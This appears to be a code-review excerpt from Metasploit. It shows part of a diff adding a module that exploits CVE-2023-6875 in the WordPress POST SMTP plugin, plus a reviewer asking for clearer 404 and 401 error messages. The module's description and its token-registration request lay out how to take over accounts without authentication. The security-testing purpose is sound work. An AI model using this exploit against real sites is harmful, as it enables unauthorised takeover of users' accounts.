modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb

```diff
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress POST SMTP Account Takeover',
+        'Description' => %q{
+          POST SMTP, a WordPress plugin,
+          prior to 2.8.7 is affected by a privilege escalation where an unauthenticated
+          user is able to reset the password of an arbitrary user. This is done by
+          requesting a password reset, then viewing the latest email logs to find
+          the associated passowrd reset email.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Ulysses Saicha', # Discovery, POC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-6875'],
+          ['URL', 'https://github.com/UlyssesSaicha/CVE-2023-6875/tree/main'],
+        ],
+        'DisclosureDate' => '2024-01-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Username to password reset', '']),
+      ]
+    )
+  end
+
+  def register_token
+    token = Rex::Text.rand_text_alphanumeric(10..16)
+    device = Rex::Text.rand_text_alphanumeric(10..16)
+    vprint_status("Attempting to Registering token #{token} on device #{device}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-json', 'post-smtp', 'v1', 'connect-app'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => { 'fcm-token' => token, 'device' => device }
+    )
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200 # 404 if the URL structure is wonky, 401 not vulnerable
```

Comment:
Could we have specific `fail_with`s for codes 404 & 401 to tell the user what's wrong in more detail?